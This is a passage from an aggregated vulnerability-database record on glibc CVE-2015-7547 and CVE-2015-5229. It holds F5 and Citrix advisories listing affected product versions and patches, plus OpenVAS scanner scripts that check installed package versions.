a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The** Severity **values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "edition": 1, "modified": "2016-04-26T00:00:00", "published": "2016-04-26T00:00:00", "id": "SOL23822215", "href": "http://support.f5.com/kb/en-us/solutions/public/k/23/sol23822215.html", "title": "SOL23822215 - glibc calloc vulnerability CVE-2015-5229", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-20T21:07:46", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "description": "\nF5 Product Development has assigned ID 574060 to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Severe| glibc DNS client side resolver \nBIG-IP AAM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.4.0 - 11.6.1| Severe| glibc DNS client side resolver \nBIG-IP AFM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.3.0 - 11.6.1| Severe| glibc DNS client side resolver \nBIG-IP Analytics| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1| Severe| glibc DNS client side resolver \nBIG-IP APM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Severe| glibc DNS client side resolver \nBIG-IP ASM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Severe| glibc DNS client side resolver \nBIG-IP DNS| 12.0.0| 12.1.0 \n12.0.0 HF2| Severe| glibc DNS client side resolver \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Severe| glibc DNS client side resolver \nBIG-IP PEM| 12.0.0| 12.1.0 \n12.0.0 HF2 \n11.3.0 - 11.6.1| Severe| glibc DNS client side resolver \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe*| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None \n \n*F5 WebSafe software is not affected by this vulnerability because the Linux kernel does not form part of the product. To address this vulnerability, F5 recommends that you upgrade the operating system that you use with the F5 WebSafe Dashboard using the standard OS tools.\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, F5 recommends that you ensure that you use only trusted DNS resolvers in your BIG-IP configuration.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n", "edition": 1, "modified": "2017-03-10T00:27:00", "published": "2016-02-17T03:33:00", "id": "F5:K47098834", "href": "https://support.f5.com/csp/article/K47098834", "title": "glibc vulnerability CVE-2015-7547", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-25T17:25:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, F5 recommends that you ensure that you use only trusted DNS resolvers in your BIG-IP configuration.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL9502: BIG-IP hotfix matrix\n", "modified": "2016-10-25T00:00:00", "published": "2016-02-16T00:00:00", "id": "SOL47098834", "href": "http://support.f5.com/kb/en-us/solutions/public/k/47/sol47098834.html", "type": "f5", "title": "SOL47098834 - glibc vulnerability CVE-2015-7547", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "citrix": [{"lastseen": "2020-11-18T15:29:33", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<h2> Overview</h2>\n<div>\n<div>\n<div>\n<p>A vulnerability has been recently disclosed in the glibc <i>getaddrinfo()</i> function. This issue could potentially allow an attacker to inject code into a process that calls the vulnerable function. The issue has been assigned the following CVE identifier:</p>\n<p>CVE-2015-7547: <u> <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547\">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547</a></u></p>\n<p>The vulnerable function is provided by some Linux based operating systems. Customers managing Linux platforms on which Citrix components are deployed are advised to apply any appropriate operating system updates as soon as possible.</p>\n<p>The following sections provide guidance on the impact and mitigation steps for Linux-based Citrix products. Citrix products that do not include or execute on a Linux based platform are not impacted by this vulnerability.</p>\n<p>Windows based components of XenDesktop and XenApp do not include, or use, the vulnerable function and are therefore not impacted by this issue.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> What Citrix is Doing</h2>\n<div>\n<div>\n<div>\n<p>Citrix is in the process of analyzing the potential impact of this issue on currently supported products that use or include the vulnerable component. The following section of this advisory provides more information on each product.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Product Details</h2>\n<div>\n<div>\n<div>\n<h2> Citrix NetScaler</h2>\n<div>\n<div>\n<div>\n<p>NetScaler VPX, NetScaler MPX, NetScaler SDX, NetScaler Insight Center and Command Center Appliance are not affected by this vulnerability.</p>\n<p>The NetScaler Gateway Client for Linux may be impacted by this operating system vulnerability. Citrix recommends that customers apply any applicable patches to the underlying Linux operating system.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix XenServer</h2>\n<div>\n<div>\n<div>\n<p>Currently supported versions of Citrix XenServer do not contain a vulnerable version of glibc and, as such, are not affected by this vulnerability.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix XenMobile</h2>\n<div>\n<div>\n<div>\n<p>Citrix XenMobile MDM 9.x for Windows is not impacted by this vulnerability. Worx Apps and MDX are not impacted by this vulnerability.</p>\n<p>The following XenMobile product versions are impacted by this vulnerability:</p>\n<ul>\n<li>XenMobile Server 10.x: XenMobile Server 10.3 Rolling Patch 1 and earlier</li>\n<li>XenMobile App Controller 9.x: XenMobile App Controller 9.0 Rolling Patch 6 and earlier</li>\n</ul>\n<p>To address this vulnerability customers should apply the following updates:</p>\n<ul>\n<li>XenMobile Server 10.3 Rolling Patch 2 - <a href=\"https://support.citrix.com/article/CTX209294\">https://support.citrix.com/article/CTX209294</a></li>\n<li>XenMobile App Controller 9.0 Rolling Patch 7 - <a href=\"https://support.citrix.com/article/CTX207571\">https://support.citrix.com/article/CTX207571</a></li>\n</ul>\n<p>XenMobile Cloud customer deployments have been patched by the Citrix XenMobile Cloud Operations team. For more details contact technical support. </p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix Receiver for Linux</h2>\n<div>\n<div>\n<div>\n<p>The Receiver for Linux may be impacted by this operating system vulnerability. Citrix recommends that customers apply any applicable patches to the underlying Linux operating system.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix Linux Virtual Desktop</h2>\n<div>\n<div>\n<div>\n<p>Citrix Linux Virtual Desktop deployments may be impacted by this operating system vulnerability. Citrix recommends that customers apply any applicable patches to the underlying Linux operating system.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix Licensing</h2>\n<div>\n<div>\n<div>\n<p>The License Server VPX appliance does contain a vulnerable version of glibc. Citrix has released a new version of the License Server VPX, 11.13.1.2, that addresses this issue. This new version can be downloaded from the following location on the Citrix Website:</p>\n<p> <br/> <a href=\"https://www.citrix.com/downloads/licensing.html\">https://www.citrix.com/downloads/licensing.html</a></p>\n<p> <br/> Customers using older versions of the License Server VPX that are not able to upgrade can, as an interim measure, log in to the License Server console and update the VPX using the following command from the command line:</p>\n<p> <br/> yum update</p>\n<p> <br/> Following the completion of the update, the server should be rebooted to ensure that the updated packages are used.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix XenDesktop Volume Worker Template</h2>\n<div>\n<div>\n<div>\n<p>Customers deploying Virtual Desktop Agents that are hosted on Citrix CloudPlatform are advised to verify that the volume worker template is using a version of glibc that is not vulnerable to this issue. Setup instructions for the volume worker template on CloudPlatform can be found in the following document: <a href=\"http://docs.citrix.com/content/dam/docs/en-us/cloudplatform/cloudplatform-43/downloads/xa-xd-cloudplatform_2014.pdf\">http://docs.citrix.com/content/dam/docs/en-us/cloudplatform/cloudplatform-43/downloads/xa-xd-cloudplatform_2014.pdf</a>.</p>\n<p>Amazon Web Services based deployments use the Linux AMI template. Guidance from Amazon about this issue can be found at the following location: <a href=\"https://aws.amazon.com/security/security-bulletins/cve-2015-7547-advisory/\">https://aws.amazon.com/security/security-bulletins/cve-2015-7547-advisory/</a></p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix VDI in a Box</h2>\n<div>\n<div>\n<div>\n<p>Citrix VDI-In-A-Box (VIAB) version 5.4.x is impacted by this vulnerability. A new version of VIAB, 5.4.8, has been released to address this vulnerability. This can be found at the following address: </p>\n<p> <a href=\"https://www.citrix.com/downloads/vdi-in-a-box.html\">https://www.citrix.com/downloads/vdi-in-a-box.html</a></p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix CloudBridge</h2>\n<div>\n<div>\n<div>\n<p>Citrix CloudBridge 7.x does not contain a vulnerable version of glibc and, as such, is not affected by this vulnerability. Analysis of the impact of this issue on Citrix CloudBridge 8.x is in progress. This section will be updated as soon as additional information is available.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Citrix ByteMobile</h2>\n<div>\n<div>\n<div>\n<p>Analysis of the impact of this issue on Citrix ByteMobile is in progress. This section will be updated as soon as additional information is available.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<p>The above list will be updated as the analysis into this issue progresses.</p>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Obtaining Support on This Issue</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"https://www.citrix.com/support/open-a-support-case.html\">https://www.citrix.com/support/open-a-support-case.html</a></u>. </p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Reporting Security Vulnerabilities</h2>\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"http://support.citrix.com/article/CTX081743\">Reporting Security Issues to Citrix</a></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div>\n<h2> Changelog</h2>\n<div>\n<div>\n<div>\n<table width=\"100%\">\n<tbody>\n<tr>\n<th colspan=\"1\" rowspan=\"1\">Date</th>\n<th colspan=\"1\" rowspan=\"1\">Change</th>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\" width=\"150\">February 19th 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Initial bulletin publishing</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">February 19th 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Update to NetScaler and XenMobile sections, addition of CloudBridge and ByteMobile sections</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">February 22nd 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Update to NetScaler section for Command Center Appliance</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">February 23rd 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Update to NetScaler section for Netscaler Gateway Client on Linux</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">March 14th 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Update to Licensing section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">May 5th 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Update to XenMobile section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">May 9th 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Clarify XenMobile section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">May 16th 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Update to XenDesktop Volume Worker Template section</td>\n</tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">November 17th 2016</td>\n<td colspan=\"1\" rowspan=\"1\">Update to VDI in a Box section</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\n</div></div>\n</section>", "edition": 2, "modified": "2019-08-15T04:00:00", "published": "2016-02-19T04:00:00", "id": "CTX206991", "href": "https://support.citrix.com/article/CTX206991", "title": "CVE-2015-7547 - Citrix Security Advisory for glibc Vulnerability", "type": "citrix", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-04-07T18:43:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "description": "The remote host is missing a security patch.", "modified": "2020-04-03T00:00:00", "published": "2016-02-23T00:00:00", "id": "OPENVAS:1361412562310105554", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105554", "type": "openvas", "title": "F5 BIG-IP - SOL47098834 - glibc vulnerability CVE-2015-7547", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - SOL47098834 - glibc vulnerability CVE-2015-7547\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105554\");\n script_cve_id(\"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - SOL47098834 - glibc vulnerability CVE-2015-7547\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/kb/en-us/solutions/public/k/47/sol47098834.html?sr=51723063\");\n\n script_tag(name:\"impact\", value:\"Currently unknown\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The glibc DNS client side resolver is vulnerable to a stack-based buffer overflow when the getaddrinfo() library function is used. Software using this function may be exploited with attacker-controlled domain names, attacker-controlled DNS servers, or through a man-in-the-middle attack.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing a security patch.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-02-23 10:30:37 +0100 (Tue, 23 Feb 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.0.0-11.6.0;10.1.0-10.2.4;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.4.0-11.6.0;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.3.0-11.6.0;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.0.0-11.6.0;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.0.0-11.6.0;10.1.0-10.2.4;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.0.0-11.6.0;10.1.0-10.2.4;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.0.0-11.6.0;10.1.0-10.2.4;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0;',\n 'unaffected', '12.1.0;12.0.0_HF2;11.3.0-11.6.0;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "description": "Oracle Linux Local Security Checks ELSA-2016-0176", "modified": "2019-03-14T00:00:00", "published": "2016-02-18T00:00:00", "id": "OPENVAS:1361412562310122878", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122878", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2016-0176", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-0176.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122878\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-02-18 07:27:20 +0200 (Thu, 18 Feb 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-0176\");\n script_tag(name:\"insight\", value:\"ELSA-2016-0176 - glibc security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-0176\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-0176.html\");\n script_cve_id(\"CVE-2015-7547\", \"CVE-2015-5229\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~106.0.1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~106.0.1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~106.0.1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~106.0.1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~106.0.1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~106.0.1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~106.0.1.el7_2.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-02-17T00:00:00", "id": "OPENVAS:1361412562310871555", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871555", "type": "openvas", "title": "RedHat Update for glibc RHSA-2016:0176-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2016:0176-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871555\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-17 06:25:51 +0100 (Wed, 17 Feb 2016)\");\n script_cve_id(\"CVE-2015-5229\", \"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for glibc RHSA-2016:0176-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C\nlibraries (libc), POSIX thread libraries (libpthread), standard math libraries\n(libm), and the name service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in unexpected\napplication behavior such as hangs or crashes. (CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and Red\nHat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs:\n\n * The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the operating\nsystem as quickly as possible. This can result in performance degradation\nwhen the rate of free calls is very high. The first memory pool (the main\npool) does provide a method to rate limit the returns via M_TRIM_THRESHOLD,\nbut this method is not available to subsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to all\nmemory pools, which improves performance for threads with very high amounts\nof free calls and limits the number of 'madvise' system calls. The change\nalso increases the total transient memory usage by processes because the\ntrim threshold must be reached before memory can be freed.\n\nTo return to the previous behavior, you can either set M_TRIM_THRESHOLD\nusing the 'mallopt' function, or set the MALLOC_TRIM_THRESHOLD environment\nvariable to 0. (BZ#1298930)\n\n * On the little-endian variant of 64-bit IBM Power Systems (ppc64le), a bug\nin the dynamic loader could cause applications compiled with profiling\nenabled to fail to start with the error 'monstartup: out of memory'.\nThe bug has been corrected and applications compiled for profiling now\nstart correctly. (BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\");\n script_tag(name:\"affected\", value:\"glibc on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0176-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-February/msg00033.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", 